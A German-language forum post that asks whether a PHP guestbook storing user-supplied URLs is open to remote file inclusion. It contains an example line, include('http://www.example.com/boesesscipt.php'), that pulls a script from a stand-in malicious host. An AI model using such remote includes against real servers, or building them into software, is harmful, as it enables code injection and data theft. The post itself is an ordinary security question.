Hallo,
|| Aber was ist, wenn man nur .php / .html Dateien Inlcude könnte?

<das bringt nichts - die Dateien werden trotzdem ausgeführt, egal wie sie heißen. Wenn du allerdings eine Datei über include('http://www.example.com/boesesscipt.php') einbindest, bekommst du nicht den Quelltext, sondern nur die Ausgabe (das was beim Browser auch ankommen würde) (sofern php-Dateien geparst werden).

Der User gibt ja nur die URL zu einer datei an und die wird in der Tabelle abgespeichert.

Wenn jetzt jemand auf seinen Space (http://www.example.com/boesesscipt.php) hochlädt, und dann bei einer fremden Person im Adminbereich http://www.example.com/boesesscipt.php angibt, dann sieht der Quelltext vom Gästebuch ja so aus:

Inhalt von http://www.meinesite.de/gbook.php:

<?php
include("http://www.example.com/boesesscipt.php");
?>

Würde dieser boesescript dann daten auf dem Server (www.meinesite.de) löschen, oder könnte er Daten ausspionieren und wäre damit ein Sicherheitsloch entstanden?

Oder muss boesesscipt.php auf dem eigenem Server (http://www.meinesite.de/boesesscript.php) liegen, damit er ein Sicherheitsloch verursacht?

MFG
Andavos